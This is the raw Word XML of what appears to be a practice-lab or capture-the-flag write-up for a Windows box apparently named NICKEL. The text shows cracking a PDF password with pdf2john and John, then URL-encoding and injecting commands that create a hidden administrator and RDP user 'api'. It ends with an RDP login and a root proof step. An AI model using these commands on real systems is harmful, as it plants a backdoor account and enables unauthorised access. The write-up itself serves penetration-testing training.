          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Due diligence encourages us to transfer and view it. We want to collect any non-default scraps we find. On second thought…this is already on ftp. We do not need to set up an SMB server to transfer it. We have credentials, let’s see if they were reused for FTP login and get it that way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A613E3A" w14:textId="46C6102B" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1921C2EB" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First we need to extract a hash that that John can work with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F6B97" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pdf2john Infrastructure.pdf &gt; pdf.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C0D31" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2FA45D" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Then put John to work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74490F9D" w14:textId="001405D5" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>john --wordlist=/usr/share/wordlists/rockyou.txt --rules=best64 pdf.hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122BBCA1" w14:textId="5111C66C" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>netstat -ano</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D42AA98" w14:textId="282131A1" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00625543">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://localhost/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5BDA1C33" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Before:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5978AB57" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#To create a user named api with a password of Dork123!</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>net user api Dork123! /add</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>#To add to the administrator and RDP groups</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>net localgroup Administrators api /add</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>net localgroup 'Remote Desktop Users' api /add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05520825" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Then I URL encoded them with </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00E26AE6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="370F1742" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>net%20user%20api%20Dork123!%20%2Fadd</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>net%20localgroup%20Administrators%20api%20%2Fadd</w:t>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>net%20localgroup%20%27Remote%20Desktop%20Users%27%20api%20%2Fadd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5B6ED" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRPr="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xfreerdp /cert:ignore /dynamic-resolution +clipboard /u:'api' /p:'Dork123!' /v:NICKEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF3F983" w14:textId="733772F1" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E26AE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Press enter or click to view image in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2DD97" w14:textId="77777777" w:rsidR="00E26AE6" w:rsidRDefault="00E26AE6" w:rsidP="00E26AE6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27CC4E7C" w14:textId="1F85BFFB"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8. Root Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64214A56" w14:textId="4C019748" w:rsidR="00843DCE" w:rsidRPr="00843DCE" w:rsidRDefault="00C54352" w:rsidP="00C54352">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>On desktop we obtain the proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D8C61" w14:textId="77777777" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="00A311DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A311DF" w:rsidRPr="00843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FB"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AD4CC6"/>
    <w:rsid w:val="00C54352"/>
    <w:rsid w:val="00C866B1"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00E26AE6"/>
    <w:rsid w:val="00F57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596D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E03A3A5B-E9F2-43CE-B86B-8D51C321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FB"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00CE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FB"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6AFB"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00CE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AFB"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E26AE6"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E26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yerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/NeoTheCapt/FilezillaExpl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Manvar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhavya Manvar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-17T17:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>